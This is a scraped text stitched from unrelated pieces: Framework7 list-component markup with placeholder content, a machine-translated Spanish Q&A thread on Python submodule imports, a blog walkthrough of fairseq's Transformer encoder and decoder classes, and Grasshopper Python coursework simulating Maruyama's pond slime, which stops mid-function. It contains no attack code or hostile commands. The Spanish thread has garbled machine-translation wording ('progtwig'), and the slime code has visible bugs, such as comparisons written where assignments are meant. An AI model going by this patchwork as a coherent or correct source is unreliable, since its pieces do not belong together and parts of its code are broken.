<Icon slot="media" icon="demo-list-icon"></Icon>
</ListItem>
<ListItem title="No icons here"></ListItem>
<li>
<ul>
<ListItem link="#" title="Ivan Petrov" after="CEO">
<Icon slot="media" icon="demo-list-icon"></Icon>
</ListItem>
<ListItem link="#" title="Two icons here">
<Icon slot="media" icon="demo-list-icon"></Icon>
<Icon slot="media" icon="demo-list-icon"></Icon>
</ListItem>
<ListItem title="No icons here"></ListItem>
<ListItem link="#" title="Ultra long text goes here, no, it is really really long">
<Icon slot="media" icon="demo-list-icon"></Icon>
</ListItem>
<ListItem title="With toggle">
<Icon slot="media" icon="demo-list-icon"></Icon>
<Toggle slot="after"></Toggle>
</ListItem>
</ul>
</li>
<ListItem link="#" title="Ultra long text goes here, no, it is really really long">
<Icon slot="media" icon="demo-list-icon"></Icon>
</ListItem>
<ListItem title="With toggle">
<Icon slot="media" icon="demo-list-icon"></Icon>
<Toggle slot="after"></Toggle>
</ListItem>
</List>
Mixed, inset
<BlockTitle>Mixed, inset</BlockTitle>
<List>
<ListItem link="#" title="Ivan Petrov" after="CEO">
<Icon slot="media" icon="demo-list-icon"></Icon>
</ListItem>
<ListItem link="#" title="Two icons here">
<Icon slot="media" icon="demo-list-icon"></Icon>
<Icon slot="media" icon="demo-list-icon"></Icon>
</ListItem>
<ListItem link="#" title="Ultra long text goes here, no, it is really really long">
<Icon slot="media" icon="demo-list-icon"></Icon>
</ListItem>
<ListItem title="With toggle">
<Icon slot="media" icon="demo-list-icon"></Icon>
<Toggle slot="after"></Toggle>
</ListItem>
<BlockFooter>
<p>Here comes some useful information about list above</p>
</BlockFooter>
</List>
Tablet inset
<BlockTitle>Tablet inset</BlockTitle>
<List tabletInset>
<ListItem link="#" title="Ivan Petrov" after="CEO">
<Icon slot="media" icon="demo-list-icon"></Icon>
</ListItem>
<ListItem link="#" title="Two icons here">
<Icon slot="media" icon="demo-list-icon"></Icon>
<Icon slot="media" icon="demo-list-icon"></Icon>
</ListItem>
<ListItem link="#" title="Ultra long text goes here, no, it is really really long">
<Icon slot="media" icon="demo-list-icon"></Icon>
</ListItem>
<BlockFooter>
<p>This list block will look like "inset" only on tablets (iPad)</p>
</BlockFooter>
</List>
Media Lists
<BlockTitle>Media Lists</BlockTitle>
<Block>
<p>Media Lists are almost the same as Data Lists, but with a more flexible layout for visualization of more complex data, like products, services, userc, etc.</p>
</Block>
<BlockTitle>Songs</BlockTitle>
<List mediaList>
<ListItem
link="#"
title="Yellow Submarine"
after="$15"
subtitle="Beatles"
text="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla sagittis tellus ut turpis condimentum, ut dignissim lacus tincidunt. Cras dolor metus, ultrices condimentum sodales sit amet, pharetra sodales eros. Phasellus vel felis tellus. Mauris rutrum ligula nec dapibus feugiat. In vel dui laoreet, commodo augue id, pulvinar lacus."
>
<img slot="media" src="https://cdn.framework7.io/placeholder/people-160x160-1.jpg" width="80" />
</ListItem>
<ListItem
link="#"
title="Don't Stop Me Now"
after="$22"
subtitle="Queen"
text="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla sagittis tellus ut turpis condimentum, ut dignissim lacus tincidunt. Cras dolor metus, ultrices condimentum sodales sit amet, pharetra sodales eros. Phasellus vel felis tellus. Mauris rutrum ligula nec dapibus feugiat. In vel dui laoreet, commodo augue id, pulvinar lacus."
>
<img slot="media" src="https://cdn.framework7.io/placeholder/people-160x160-2.jpg" width="80" />
</ListItem>
<ListItem
link="#"
title="Billie Jean"
after="$16"
subtitle="Michael Jackson"
text="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla sagittis tellus ut turpis condimentum, ut dignissim lacus tincidunt. Cras dolor metus, ultrices condimentum sodales sit amet, pharetra sodales eros. Phasellus vel felis tellus. Mauris rutrum ligula nec dapibus feugiat. In vel dui laoreet, commodo augue id, pulvinar lacus."
>
<img slot="media" src="https://cdn.framework7.io/placeholder/people-160x160-3.jpg" width="80" />
</ListItem>
</List>
Mail App
<BlockTitle>Mail App</BlockTitle>
<List mediaList>
<ListItem
link="#"
title="Facebook"
after="17:14"
subtitle="New messages from John Doe"
text="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla sagittis tellus ut turpis condimentum, ut dignissim lacus tincidunt. Cras dolor metus, ultrices condimentum sodales sit amet, pharetra sodales eros. Phasellus vel felis tellus. Mauris rutrum ligula nec dapibus feugiat. In vel dui laoreet, commodo augue id, pulvinar lacus."
></ListItem>
<ListItem
link="#"
title="John Doe (via Twitter)"
after="17:11"
subtitle="John Doe (@_johndoe) mentioned you on Twitter!"
text="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla sagittis tellus ut turpis condimentum, ut dignissim lacus tincidunt. Cras dolor metus, ultrices condimentum sodales sit amet, pharetra sodales eros. Phasellus vel felis tellus. Mauris rutrum ligula nec dapibus feugiat. In vel dui laoreet, commodo augue id, pulvinar lacus."
></ListItem>
<ListItem
link="#"
title="Facebook"
after="16:48"
subtitle="New messages from John Doe"
text="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla sagittis tellus ut turpis condimentum, ut dignissim lacus tincidunt. Cras dolor metus, ultrices condimentum sodales sit amet, pharetra sodales eros. Phasellus vel felis tellus. Mauris rutrum ligula nec dapibus feugiat. In vel dui laoreet, commodo augue id, pulvinar lacus."
></ListItem>
<ListItem
link="#"
title="John Doe (via Twitter)"
after="15:32"
subtitle="John Doe (@_johndoe) mentioned you on Twitter!"
text="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla sagittis tellus ut turpis condimentum, ut dignissim lacus tincidunt. Cras dolor metus, ultrices condimentum sodales sit amet, pharetra sodales eros. Phasellus vel felis tellus. Mauris rutrum ligula nec dapibus feugiat. In vel dui laoreet, commodo augue id, pulvinar lacus."
></ListItem>
</List>
Something more simple
<BlockTitle>Something more simple</BlockTitle>
<List mediaList>
<ListItem
title="Yellow Submarine"
subtitle="Beatles">
<img slot="media" src="https://cdn.framework7.io/placeholder/fashion-88x88-1.jpg" width="44" />
</ListItem>
<ListItem
link="#"
title="Don't Stop Me Now"
subtitle="Queen">
<img slot="media" src="https://cdn.framework7.io/placeholder/fashion-88x88-2.jpg" width="44" />
</ListItem>
<ListItem
title="Billie Jean"
subtitle="Michael Jackson">
<img slot="media" src="https://cdn.framework7.io/placeholder/fashion-88x88-3.jpg" width="44" />
</ListItem>
</List>
Inset
<BlockTitle>Inset</BlockTitle>
<List mediaList inset>
<ListItem
link="#"
title="Yellow Submarine"
subtitle="Beatles">
<img slot="media" src="https://cdn.framework7.io/placeholder/fashion-88x88-4.jpg" width="44" />
</ListItem>
<ListItem
link="#"
title="Don't Stop Me Now"
subtitle="Queen">
<img slot="media" src="https://cdn.framework7.io/placeholder/fashion-88x88-5.jpg" width="44" />
</ListItem>
<ListItem
link="#"
title="Billie Jean"
subtitle="Michael Jackson">
<img slot="media" src="https://cdn.framework7.io/placeholder/fashion-88x88-6.jpg" width="44" />
</ListItem>
</List>
|
El mecanismo de importación de Python siempre es un mito para mí. A veces, importar un paquete puede otorgar acceso a los módulos que se encuentran debajo de él. Por ejemplo,
import urllib urllib.parse.unquote
da
lo que muestra que las funciones son accesibles incluso con solo el paquete (es decir, urllib en este caso) importado pero no hasta el archivo del módulo. Esto se hace dentro del cuaderno de Jupyter.
Pero cuando hago lo mismo en la terminal.
>>> import urllib >>> urllib.parse.unquote Traceback (most recent call last): File "", line 1, in AttributeError: module 'urllib' has no attribute 'parse'
Ambas versiones de Python son 3.6.1.
¿Qué marca la diferencia y cuál es la buena práctica?
Para que un acceso a urllib.parse funcione, se deben cumplir las dos condiciones siguientes:
El objeto del módulo
urllibdebe estar vinculado al nombre deurllib, ya sea en el ámbito local, global o en algún ámbito que lourllib. El submódulourllib.parsedebe haberse inicializado y vinculado al atributo parse del objeto del módulourllib. Unurllibimportación en el ámbito local o global actual (o cualquier ámbito adjunto) satisface la primera condición.
Un
import urllib.parseejecutado en cualquier parte del progtwig satisface la segunda condición, ya que carga el submódulo y lo enlaza al atributoparseen el objeto del módulourllib, y solo hay un objeto del módulourllibpara todo el progtwig.
En los entornos donde
urllib.parseera accesible después de un simpleurllibimportación, algún otro código debe haber cargadourllib.parse, causando que lo vea.
Test: "import IPython" └─IPython:┐ ┌────┘ ├──"from core.application import Application" │ └──IPython.core.application: "from IPython.core import release, crashhandler" │ └──IPython.core.crashhandler: "from IPython.core import ultratb" │ └──IPython.core.ultratb: "import pydoc" │ └──pydoc: "import urllib.parse" └──"from terminal.embed import embed" └──IPython.terminal.embed:┐ ┌───────────┘ ├──"from IPython.core import magic_arguments" │ └──IPython.core.magic_arguments: "from IPython.utils.text import dedent" │ └──IPython.utils.text: "from pathlib import Path" │ └──pathlib: "from urllib.parse import quote_from_bytes" ├──"from IPython.core.magic import Magics, magics_class, line_magic" │ └──IPython.core.magic: "from IPython.core import oinspect" │ └──IPython.core.oinspect: "from IPython.core import page" │ └──IPython.core.page: "from IPython.core.display import display" │ └──IPython.core.display: "import mimetypes" │ └──mimetypes: "import urllib.parse" └──"from IPython.terminal.interactiveshell import TerminalInteractiveShell" └──pygments.plugin: "import pkg_resources" └──pkg_resources: "import email.parser" └──email.parser: "from email.feedparser import FeedParser, BytesFeedParser" └──email.feedparser: "from email._policybase import compat32" └──email._policybase: "from email.utils import _has_surrogates" └──email.utils: "import urllib.parse"
La última línea de hecho toca urllib.parse .
import scipy no proporciona acceso a scipy.stats.norm en una terminal o en una computadora portátil Jupyter porque ningún entorno afecta a scipy.stats .
Podemos concluir desde arriba que no solo es una buena práctica, sino que de hecho es un requisito para ## importar todos los niveles del módulo ##.
¡Gracias por todas las respuestas!
Para que un acceso a urllib.parse funcione, se deben cumplir las dos condiciones siguientes:
urllib debe estar vinculado al nombre de urllib , ya sea en el ámbito local, global o en algún ámbito que lo urllib . urllib.parse debe haberse inicializado y vinculado al atributo parse del objeto del módulo urllib .
Un import urllib en el ámbito local o global actual (o cualquier ámbito adjunto) satisface la primera condición.
Un import urllib.parse ejecutado en cualquier parte del progtwig satisface la segunda condición, ya que carga el submódulo y lo enlaza al atributo parse en el objeto del módulo urllib , y solo hay un objeto del módulo urllib para todo el progtwig.
En los entornos donde urllib.parse era accesible después de un simple import urllib , algún otro código debe haber cargado urllib.parse , causando que lo vea.
Como user2357112 dijo que se está importando; Creo que estos son los módulos y declaraciones específicas.
Test: "import IPython" └─IPython:┐ ┌────┘ ├──"from core.application import Application" │ └──IPython.core.application: "from IPython.core import release, crashhandler" │ └──IPython.core.crashhandler: "from IPython.core import ultratb" │ └──IPython.core.ultratb: "import pydoc" │ └──pydoc: "import urllib.parse" └──"from terminal.embed import embed" └──IPython.terminal.embed:┐ ┌───────────┘ ├──"from IPython.core import magic_arguments" │ └──IPython.core.magic_arguments: "from IPython.utils.text import dedent" │ └──IPython.utils.text: "from pathlib import Path" │ └──pathlib: "from urllib.parse import quote_from_bytes" ├──"from IPython.core.magic import Magics, magics_class, line_magic" │ └──IPython.core.magic: "from IPython.core import oinspect" │ └──IPython.core.oinspect: "from IPython.core import page" │ └──IPython.core.page: "from IPython.core.display import display" │ └──IPython.core.display: "import mimetypes" │ └──mimetypes: "import urllib.parse" └──"from IPython.terminal.interactiveshell import TerminalInteractiveShell" └──pygments.plugin: "import pkg_resources" └──pkg_resources: "import email.parser" └──email.parser: "from email.feedparser import FeedParser, BytesFeedParser" └──email.feedparser: "from email._policybase import compat32" └──email._policybase: "from email.utils import _has_surrogates" └──email.utils: "import urllib.parse"
Python 3 no carga los módulos auxiliares para urllib automáticamente. ( https://docs.python.org/2/library/urllib.html )
“Nota: el módulo urllib se ha dividido en partes y se le ha cambiado el nombre en Python 3 a urllib.request, urllib.parse y urllib.error. La herramienta 2to3 adaptará automáticamente las importaciones al convertir sus fonts a Python 3.”
“Nota urllib también expone ciertas funciones de utilidad como splittype, splithost y otras analizando la URL en varios componentes. Pero se recomienda usar urlparse para analizar las URL en lugar de usar estas funciones directamente. Python 3 no expone estas funciones de ayuda desde el módulo urllib.parse . ”
Si intenta consultar el directorio de espacio de nombres urllib (urllib) después de la importación, no hay submódulos. Después de escribir urllib.parse.unquote y obtener el error, se cargan los módulos de ayuda de urllib. (Lo digo en serio, eso suena loco e incorrecto, todas las cosas no son Python, “él es un n00b”, solo inténtalo). Puedes verlas en el espacio de nombres a través de dir (urllib) y puedes consultarlas para usarlas como si fueran todas. cargado inicialmente. A continuación, obtendrá el retorno de objeto de función.
Python 3.5.2 (default, Aug 18 2017, 17:48:00) [GCC 5.4.0 20160609] on linux Type "help", "copyright", "credits" or "license" for more information.
>>> import urllib
>>> urllib.parse.unquote
Traceback (most recent call last): File " AttributeError: module 'urllib' has no attribute 'parse'
>>> urllib.parse.unquote
En el módulo seis, hay builtins.module (builtins.object)
Module_six_moves_urllib _LazyDescr(builtins.object) MovedAttribute MovedModule _LazyModule(builtins.module) Module_six_moves_urllib_error Module_six_moves_urllib_parse Module_six_moves_urllib_request Module_six_moves_urllib_response Module_six_moves_urllib_robotparser
Hay documentación adicional (por supuesto) tal como
class Module_six_moves_urllib (builtins.module) “| Cree un espacio de nombres six.moves.urllib que se parezca al espacio de nombres de Python 3”
Sospecho que el terminal no invoca el builtin para cargar los módulos auxiliares de forma automática como lo hace Jupyter, aunque, sinceramente, no lo sé.
Editar para agregar: Importar urllib, importar seis e invocarlo [incluso help (“six”)] cargará los módulos de análisis, solicitud, respuesta, robotparser al espacio de nombres de urllib. Además, la importación de urllib y las llamadas de ayuda en él cargarán el análisis pero no los otros módulos en el espacio de nombres. Es posible que Jupyter esté cargando la ayuda de forma proactiva, lo que hace que solo cargue el módulo de análisis. No tengo instalado IPython / conda / Jupyter, así que no puedo ayudar a probar.
|
BART is a novel denoising autoencoder that achieved excellent result on Summarization. It is proposed by FAIR and a great implementation is included in its production grade seq2seq framework: fariseq. In this tutorial I will walk through the building blocks of how a BART model is constructed.
Transformer Model
BART follows the recenly successful Transformer Model framework but with some twists. So let’s first look at how a Transformer model is constructed.
Overview
Fairseq adopts a highly object oriented design guidance. At the very top level there isa Transformer class that inherits from a FairseqEncoderDecoderModel, which in turn inheritsfrom a BaseFairseqModel, which inherits from nn.Module. These are relatively light parentclasses and many methods in base classes are overriden by child classes. We will focuson the Transformer class and the FairseqEncoderDecoderModel.
Besides, a Transformer model is dependent on a TransformerEncoder and a TransformerDecodermodule. A TransformerEncoder requires a special TransformerEncoderLayer module. TheTransformerEncoder module provids feed forward method that passes the data from inputto encoder output, while each TransformerEncoderLayer builds a non-trivial and reusablepart of the encoder layer - the layer including a MultiheadAttention module, and LayerNorm.Similarly, a TransforemerDecoder requires a TransformerDecoderLayer module. Specially,a TransformerDecoder inherits from a FairseqIncrementalDecoder class that definesincremental output production interfaces. Finally, the MultiheadAttention class inheritsfrom FairseqIncrementalState, which allows the module to save outputs from previous timesteps.
To sum up, I have provided a diagram of dependency and inheritance of the aforementioned modules as below. Note that dependency means the modules holds 1 or more instance of the dependent module, denoted by square arrow. And inheritance means the module holds all methods and attributes from parent class, denoted by angle arrow.
TransformerModel
A TransformerModel has the following methods, see comments for explanation of the usefor each method:
@register_model("transformer") class TransformerModel(FairseqEncoderDecoderModel): # defines where to retrive pretrained model from torch hub @classmethod def hub_models(cls):... # pass in arguments from command line, initialize encoder and decoder def __init__(self, args, encoder, decoder):... # adds argument to command line entrance @classmethod def add_args(parser):... # compute encoding for input, construct encoder and decoder, returns a # Transformer instance @classmethod def bulid_model(cls, args, task):... # helper function to build an encoder @classmethod def build_encoder(cls, args, src_dict, embed_tokens):... # helper function to build a decoder @classmethod def build_decoder(cls, args, tgt_dict, embed_tokens):... # mostly the same with FairseqEncoderDecoderModel::forward, connects # encoder and decoder. def forward( self, src_tokens, src_lengths, prv_output_tokens, cls_input, return_all_hiddens, features_only, alingment_layer, alignement_heads ):...
This is a standard Fairseq style to build a new model. By using the decorator@register_model, the model name gets saved to MODEL_REGISTRY (see model/ __init__.py), which is a global dictionary that maps the string of the classname to an instance of the class.
Another important side of the model is a named architecture, a model maybebound to different architecture, where each architecture may be suited for aspecific variation of the model. Along with Transformer model we have thesearchitectures:
@register_model_architecture("transformer", "transformer") def base_architecture(args):... @register_model_architecture("transformer", "transformer_iwslt_de_en") def transformer_iwslt_de_en(args):... @register_model_architecture("transformer", "transformer_wmt_en_de") def transformer_wmt_en_de(args):... # parameters used in the "Attention Is All You Need" paper (Vaswani et al., 2017) @register_model_architecture("transformer", "transformer_vaswani_wmt_en_de_big") def transformer_vaswani_wmt_en_de_big(args):... ...
The architecture method mainly parses arguments or defines a set of default parametersused in the original paper. It uses a decorator function @register_model_architecture,which adds the architecture name to a global dictionary ARCH_MODEL_REGISTRY, which mapsthe architecture to the correpsonding MODEL_REGISTRY entry. ARCH_MODEL_REGISTRY isthen exposed to option.py::add_model_args, which adds the keys of the dictionaryto command line choices. I suggest following through the official tutorial to get moreunderstanding about extending the Fairseq framework.
Two most important compoenent of Transfomer model is TransformerEncoder andTransformerDecoder.
TransformerEncoder
A TransformerEncoder inherits from FairseqEncoder. FairseqEncoder is an nn.module.FairseqEncoder defines the following methods:
# FairseqEncoder.py EncoderOut = NamedTuple( "EncoderOut", [ ("encoder_out", Tensor), # T x B x C ("encoder_padding_mask", Tensor), # B x T ("encoder_embedding", Tensor), # B x T x C ("encoder_states", Optional[List[Tensor]]), # List[T x B x C] ], ) class FairseqEncoder(nn.Module): # initialize the class, saves the token dictionray def __init__(self, dictionary):... # Required to be implemented def forward(self, src_tokens, src_lengths=None, **kwargs):... # The output of the encoder can be reordered according to the # `new_order` vector. Requried to be implemented def reorder_encoder_out(self, encoder_out, new_order):... # An arbitrary large positive number def max_positions(self):... # For old Fairseq version compatibility def upgrade_state_dict(self, state_dict):...
Besides, FairseqEncoder defines the format of an encoder output to be a EncoderOuttype. EncoderOut is a NamedTuple. The items in the tuples are:
encoder_out: of shapeTime x Batch x Channel, the output of the encoder.
encoder_padding_mask: of shapeBatch x Time. It’s of the same length of each input, acting as the bitwise mask to show which part of the sentence is padding.
encoder_embedding: of shapeTime x Batch x Channel, the word embeddings before applying the positional encoding, layer norm and dropout.
encoder_states: of shapelist[Time x Batch x Channel], intermediate output from the encoder, may beNoneif not needed.
The Transformer class defines as follows:
class TransformerEncoder(FairseqEncoder): # initialize all layers, modeuls needed in forward # including TransformerEncoderlayer, LayerNorm, # PositionalEmbedding etc. # embed_tokens is an `Embedding` instance, which # defines how to embed a token (word2vec, GloVE etc.) def __init__(self, args, dictionary, embed_tokens):... # forward embedding takes the raw token and pass through # embedding layer, positional enbedding, layer norm and # dropout def forward_embedding(self, src_tokens):... # Forward pass of a transformer encoder. Chains of # TransformerEncoderLayer. Returns EncoderOut type. def forward( self, src_tokens, src_lengths, cls_input: Optional[Tensor] = None, return_all_hiddens: bool = False, ):... def reorder_encoder_out(self, encoder_out: EncoderOut, new_order):... def max_positions(self):...
In forward pass, the encoder takes the input and pass through forward_embedding,then pass through several TransformerEncoderLayers, notice that LayerDrop[3] isused to arbitrarily leave out some EncoderLayers.
TransformEncoderLayer
A TransformEncoderLayer is a nn.Module, which means it should implement aforward method. Refer to reading [2] for a nice visual understanding of whatone of these layers looks like. The module is defined as:
class TransformerEncoderLayer(nn.Module): def __init__(self, args):... def upgrade_state_dict_named(self, state_dict, name):... def forward(self, x, encoder_padding_mask, attn_mask: Optional[Tensor] = None):...
Notice the forward method, where encoder_padding_mask indicates the padding postionsof the input, and attn_mask indicates when computing output of position, it should notconsider the input of some position, this is used in the MultiheadAttention module.
There is a subtle difference in implementation from the original Vaswani implementationto tensor2tensor implementation. In the former implmentation the LayerNorm is appliedafter the MHA module, while the latter is used before. In this module, it provides a switch normalized_before in args to specify which mode to use.
TransformerDecoder
A TransformerDecoder has a few differences to encoder. First, it is a FairseqIncrementalDecoder,which in turn is a FairseqDecoder.
Comparing to FairseqEncoder, FairseqDecoderrequires implementing two more functions outputlayer(features) andgetNormalizedProbs(net_output, log_probs, sample). Where the first method convertsthe features from decoder to actual word, the second applies softmax functions tothose features.
FairseqIncrementalDecoder is a special type of decoder. During inference time,a seq2seq decoder takes in an single output from the prevous timestep and generatethe output of current time step. In order for the decorder to perform more interestingoperations, it needs to cache long term states from earlier time steps. These includesall hidden states, convolutional states etc. A FairseqIncrementalDecoder is defined as:
@with_incremental_state class FairseqIncrementalDecoder(FairseqDecoder): def __init__(self, dictionary):... # Notice the incremental_state argument - used to pass in states # from earlier timesteps def forward(self, prev_output_tokens, encoder_out=None, incremental_state=None, **kwargs):... # Similar to forward(), but only returns the features def extract_features(self, prev_output_tokens, encoder_out=None, incremental_state=None, **kwargs):... # reorder incremental state according to new order (see the reading [4] for an # example how this method is used in beam search) def reorder_incremental_state(self, incremental_state, new_order):... def set_beam_size(self, beam_size):...
Notice this class has a decorator @with_incremental_state, which adds anotherbase class: FairseqIncrementalState. This class provides a get/set function forthe incremental states. These states were stored in a dictionary. Each classhas a uuid, and the states for this class is appended to it, sperated by a dot(.).A nice reading for incremental state can be read here [4].
The TransformerDecoder defines the following methods:
class TransformerDecoder(FairseqIncrementalDecoder): # Similar to TransformerEncoder::__init__ def __init__(self, args, dictionary, embed_tokens, no_encoder_attn=False):... # Wraps over extract_features() def forward(...):... # Applies feed forward functions to encoder output. See below discussion def extract_features( prev_output_tokens, encoder_out, incremental_state, full_context_alignment, alignment_layer, alignment_heads, ):... # Convert from feature size to vocab size. def output_layer(self, features):... def max_positions(self):... # Retrieves if mask for future tokens is buffered in the class def buffered_future_mask(self, tensor):... def upgrade_state_dict_named(self, state_dict, name):...
extract_features applies feed forward methods to encoder output, following someother features mentioned in [5]. In particular:
The decoder may use the average of the attention head as the attention output.
The argument may specify alignment_headsto only average over this many heads. This is anauto regressive maskfeature introduced in the paper.
TransformerDecoderLayer
A TransformerDecoderLayer defines a sublayer used in a TransformerDecoder.In accordance with TransformerDecoder, this module needs to handle the incrementalstate introduced in the decoder step. It sets the incremental state to the MultiheadAttentionmodule. Different from the TransformerEncoderLayer, this module has a new attentionsublayer called encoder-decoder-attention layer. This feature is also implemented insidethe MultiheadAttention module. See [4] for a visual strucuture for a decoder layer.
A TransformerDecoderLayer is defined as:
class TransformerDecoderLayer(nn.Module): # setup components required for forward def __init__( self, args, no_encoder_attn=False, add_bias_kv=False, add_zero_attn=False ):... # Requres when running the model on onnx backend. def prepare_for_onnx_export_(self):... def forward( self, x, encoder_out, encoder_padding_mask, incremental_state, prev_self_attn_state, prev_attn_state, self_attn_mask, self_attn_padding_mask, need_attn, need_head_weights, ):...
Comparing to TransformerEncoderLayer, the decoder layer takes more arugments.Since a decoder layer has two attention layers as compared to only 1 in an encoderlayer. The prev_self_attn_state and prev_attn_state argument specifies thosestates from a previous timestep. The need_attn and need_head_weights argumentsare there to specify whether the internal weights from the two attention layersshould be returned, and whether the weights from each head should be returnedindependently.
Among the TransformerEncoderLayer and the TransformerDecoderLayer, the mostimportant component is the MultiheadAttention sublayer. Let’s take a look athow this layer is designed.
MultiheadAttention
Note: according to Myle Ott, a replacement plan for this module is on the way. My assumption is they may separately implement the MHA used in a Encoder to that used in a Decoder.
The methods implemented in this class:
@with_incremental_state class MultiheadAttention(nn.Module): def __init__(...):... # Applies Xavier parameter initialization def reset_parameters(self):... # See discussion below def forward( self, query, key, value, key_padding_mask, incremental_state, need_weights, static_kv, attn_mask, before_softmax, need_head_weights, ) -> Tuple[Tensor, Optional[Tensor]]:... # concatnate key_padding_mask from current time step to previous # time step. Required for incremental decoding. @staticmethod def _append_prev_key_padding_mask() -> Optional[Tensor]:... # reorder incremental state according to new_order vector # Not used?? def reorder_incremental_state():... # _input_buffer includes states from a previous time step. # saved to 'attn_state' in its incremental state def _get_input_buffer() -> Dict[str, Optional[Tensor]]:... def _set_input_buffer():... # Empty hook for internal use def apply_sparse_mask(attn_weights, tgt_len: int, src_len: int, bsz: int):... def upgrade_state_dict_named(self, state_dict, name):...
The forward method defines the feed forward operations applied for a multi headattention sublayer. Notice that query is the input, and key, value are optionalarguments if user wants to specify those matrices, (for example, in an encoder-decoderattention sublayer). In regular self-attention sublayer, they are initialized with asimple linear layer. key_padding_mask specifies the keys which are pads.
There is an option to switch between Fairseq implementation of the attention layer to that of Pytorch.
Miscellaneous
LayerNorm is a module that wraps over the backends of Layer Norm [7] implementation.It dynamically detremines whether the runtime uses apexor not to return the suitable implementation.
PositionalEmbedding is a module that wraps over two different implementations ofadding time information to the input embeddings. They are SinusoidalPositionalEmbeddingand LearnedPositionalEmbedding. See [6] section 3.5.
References and Readings
Extending Fairseq: https://fairseq.readthedocs.io/en/latest/overview.html
Visual understanding of Transformer model. http://jalammar.github.io/illustrated-transformer/
Reducing Transformer Depth on Demand with Structured Dropout https://arxiv.org/abs/1909.11556
Reading on incremental decoding: http://www.telesens.co/2019/04/21/understanding-incremental-decoding-in-fairseq/#Incremental_Decoding_during_Inference
Jointly Learning to Align and Translate with Transformer Models: https://arxiv.org/abs/1909.02074
Attention is all You Need: https://arxiv.org/abs/1706.03762
Layer Norm: https://arxiv.org/abs/1607.06450
|
Maruyama’s Pond Slime
Coursework for Design Computation II
Implementation of Maruyama's pond slime algorithm in both 2d and 3d using Rhino and GH Python. A simple cell-based algorithm for simluating pond slime growth using the following rules:
1. If there are more than or equal to four cells in a straight line by the active cell, make a left turn, then a right one.
2. If unblocked and there are less than or equal to four cells in the same line, active cells grow stright. If active cells hit boundary, make a turn by the last turning direction.
3. If blocked by itself, make a left turn.
4. If blocked by others, make a right turn.
The 3d simulation appends the following modifications:
1. Cells may navigate on XY, XZ, and YZ planes. A cell can only turn on planes that is not perpendicular to its moving direction.
2. A cell turns left or right following the original algorith. At each turn, it picks a plane from random.
Program:Design Computation
Date:2018
Demonstration of simulation.
GH Python Code:
__author__ = "Vincent Mai"
__version__ = "2018.11.10"
"""
Design Computation II
Maruyama's Pond Slime 2D
"""
import random
import ghpythonlib.treehelpers as th
# GH data input:
n = num
rows, cols = size, size
class Slime(object):
def __init__(self):
self.locs = set() # a set of location the slime occupies
self.frontiers = [] # stores two activeCells
self.active = True
self.color = (random.randint(0, 255),
random.randint(0, 255),
random.randint(0, 255))
def initCells(self, emptyGrid):
"""
initialize the first two cells of slime
"""
loc1 = random.sample(emptyGrid, 1)[0]
loc2Options = []
for d in [(1, 0), (-1, 0), (0, -1), (0, 1)]:
option = (loc1[0]+d[0], loc1[1]+d[1])
if option in emptyGrid: loc2Options.append(option)
loc2 = random.choice(loc2Options)
dir1, dir2 = (loc1[0]-loc2[0], loc1[1]-loc2[1]),
(loc2[0]-loc1[0], loc2[1]-loc1[1])
cell1 = ActiveCell(loc1, dir1)
cell2 = ActiveCell(loc2, dir2)
self.frontiers += [cell1, cell2]
self.update(emptyGrid)
def update(self, emptyGrid):
"""
update slime occupied locations and emptygrid cells
"""
self.locs |= {self.frontiers[0].loc, self.frontiers[1].loc}
emptyGrid -= self.locs
if not self.frontiers[0].active and not self.frontiers[1].active:
self.active = False
def grow(self, emptyGrid):
"""
grow slime if cells in frontiers are active
"""
for cell in self.frontiers:
if cell.active == True:
cell.turn(self.locs, emptyGrid, boundaryGrid)
nextCell = cell.getNextCell()
if nextCell not in emptyGrid:
cell.active = False
else:
cell.loc = nextCell
cell.curLen += 1
self.update(emptyGrid)
class ActiveCell(object):
def __init__(self, location, direction):
self.loc = location
self.dir = direction
self.curTurn = 'left'
self.curLen = 3 # length of current line
self.active = True
def getNextCell(self):
"""
return the next potential cell to grow to
"""
nextCell = (self.loc[0]+self.dir[0], self.loc[1]+self.dir[1])
return nextCell
def changeDir(self, turn):
"""
update direction as specified by turn
"""
if turn == 'left':
self.dir = (-self.dir[1], self.dir[0])
elif turn == 'right':
self.dir = (self.dir[1], -self.dir[0])
def turn(self, slimeLocs, emptyGrid, boundaryGrid):
"""
turn based on the next cell encountered
"""
nextCell = self.getNextCell()
if nextCell in emptyGrid:
if self.curLen >= 4 and self.curTurn == 'left':
self.changeDir(self.curTurn)
self.curTurn = 'right'
self.curLen = 1
elif self.curLen >= 4 and self.curTurn == 'right':
self.changeDir(self.curTurn)
self.curTurn = 'left'
self.curLen = 1
if nextCell not in boundaryGrid:
self.changeDir(self.curTurn)
self.curLen = 1
elif nextCell in slimeLocs:
self.changeDir('left')
self.curTurn == 'left'
self.curLen = 1
elif nextCell not in emptyGrid:
self.changeDir('right')
self.curTurn == 'right'
self.curLen = 1
if reset:
# generate grid
boundaryGrid = set((row, col) for row in range(rows) for col in range(cols))
emptyGrid = set((row, col) for row in range(rows) for col in range(cols))
random.seed(0)
slimeList = []
colorsList = []
branchesList = []
indicesList = []
for i in range(n):
newSlime = Slime()
newSlime.initCells(emptyGrid)
slimeList.append(newSlime)
else:
branchesList = []
indicesList = []
colorsList = []
for slime in slimeList:
slime.grow(emptyGrid)
branchesList.append([e[0] for e in slime.locs])
indicesList.append([e[1] for e in slime.locs])
colorsList.append(str(slime.color))
branches = th.list_to_tree(branchesList)
indices = th.list_to_tree(indicesList)
color = th.list_to_tree(colorsList)
__author__ = "Vincent Mai"
__version__ = "2018.11.10"
"""
Design Computation II
Maruyama's Pond Slime 3D
"""
import random
import ghpythonlib.treehelpers as th
# GH data input:
n = num
rows, cols, heis = size, size, size
class Slime(object):
def __init__(self):
self.locs = set() # a set of location the slime occupies
self.frontiers = [] # stores two activeCells
self.active = True
self.color = (random.randint(0, 255),
random.randint(0, 255),
random.randint(0, 255))
def initCells(self, emptyGrid):
"""
initialize the first two cells of slime
"""
loc1 = random.sample(emptyGrid, 1)[0]
loc2Options = []
for d in [(1, 0, 0), (-1, 0, 0), (0, -1, 0),
(0, 1, 0), (0, 0, 1), (0, 0, -1)]:
